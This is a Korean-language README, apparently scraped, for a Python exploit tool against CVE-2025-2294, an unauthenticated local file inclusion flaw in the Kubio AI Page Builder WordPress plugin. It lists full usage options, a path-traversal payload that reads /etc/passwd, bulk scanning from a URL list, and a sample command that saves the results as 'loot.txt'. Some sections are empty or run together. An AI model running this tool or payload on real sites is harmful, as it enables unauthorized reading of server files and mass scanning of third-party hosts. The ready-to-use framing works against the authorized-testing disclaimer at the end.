
CVE-2025-2294에 대한 Python 익스플로잇 스크립트로, WordPress Kubio AI Page Builder ≤ 2.5.1에서 인증되지 않은 로컬 파일 포함 취약점입니다. 단일/다중 대상 스캔, 사용자 정의 페이로드, 프록시 및 응답 미리보기를 지원합니다.
CVE-2025-2294는 Kubio AI Page Builder WordPress 플러그인(버전 2.5.1 이하)에 영향을 미칩니다. 이 플러그인은 thekubio_hybrid_theme_load_template 함수를 통해 인증되지 않은 로컬 파일 포함(LFI) 취약점을 가지고 있습니다.
이 취약점으로 인해 공격자는 취약한 WordPress 서버에서 임의의 파일을 포함하고 실행할 수 있으며, 이로 인해 다음이 가능해질 수 있습니다:
이 Python 스크립트는 취약한 WordPress 사이트에 특별히 조작된 HTTP GET 요청을 보내 LFI 문제에 취약한지 확인합니다.
/etc/passwd)usage: cve_2025_2294.py [-h] [--url URL] [--payload PAYLOAD] [--save SAVE]
[--lines LINES] [--timeout TIMEOUT] [--proxy PROXY]
[--check] [--list LIST]
CVE-2025-2294 LFI Exploit
optional arguments:
-h, --help 도움말 메시지를 표시하고 종료합니다
--url URL 대상 URL (예: http://127.0.0.1:8080)
--payload PAYLOAD
LFI 페이로드 경로 (기본값: ../../../../../../../../etc/passwd)
--save SAVE 전체 응답을 파일에 저장합니다 (선택 사항)
--lines LINES 미리보기 줄 수 (기본값: 10)
--timeout TIMEOUT
요청 시간 제한(초) (기본값: 10)
--proxy PROXY 프록시 URL (예: http://127.0.0.1:8080)
--check 취약점 상태만 확인, 저장 또는 미리보기 없음
--list LIST 하나씩 확인할 URL 목록이 포함된 파일 경로
python3 cve_2025_2294.py --url "http://192.168.1.10" --save loot.txt --lines 20 --payload /etc/passwd --timeout 10 --proxy "http://127.0.0.1:8080"
요청/응답:
이 도구는 공인된 보안 테스트 및 연구 목적으로만 사용해야 합니다. 허가 없이 시스템에 무단으로 사용하는 것은 불법이며 비윤리적입니다.